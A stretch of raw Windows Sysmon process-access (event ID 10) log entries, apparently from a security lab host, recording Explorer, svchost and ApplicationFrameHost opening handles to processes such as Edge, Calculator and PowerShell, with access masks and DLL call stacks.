22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337e-6013-9502-000000001100}7612C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360363Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337c-6013-8e02-000000001100}1960C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360362Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3380-6013-9a02-000000001100}7332C:\Windows\System32\MicrosoftEdgeCP.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360361Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337d-6013-9102-000000001100}7292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360360Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-339a-6013-c202-000000001100}10132C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360359Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3381-6013-9d02-000000001100}8712C:\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360358Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360357Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360356Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+320f9|C:\Windows\system32\twinui.pcshell.dll+31966|C:\Windows\system32\twinui.pcshell.dll+14b85|C:\Windows\system32\twinui.pcshell.dll+11de6|C:\Windows\system32\twinui.pcshell.dll+1a72c|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360355Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+96e76|C:\Windows\System32\TaskFlowDataEngine.dll+93c96|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360354Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337e-6013-9402-000000001100}75849212C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360353Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.780{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360352Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.780{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360351Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.780{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360350Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.780{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3ba1c|C:\Windows\system32\twinui.pcshell.dll+135ae|C:\Windows\system32\twinui.pcshell.dll+131c0|C:\Windows\system32\twinui.pcshell.dll+27787|C:\Windows\system32\twinui.pcshell.dll+ec44|C:\Windows\system32\twinui.pcshell.dll+e30d|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2 10341000x8000000000000000360349Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.765{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360348Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.765{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360347Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.765{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360346Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.765{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360345Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360344Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360343Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3ba1c|C:\Windows\system32\twinui.pcshell.dll+135ae|C:\Windows\system32\twinui.pcshell.dll+131c0|C:\Windows\system32\twinui.pcshell.dll+20cec|C:\Windows\system32\twinui.pcshell.dll+1003d|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2 10341000x8000000000000000360342Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed 10341000x8000000000000000360341Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b 10341000x8000000000000000360340Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 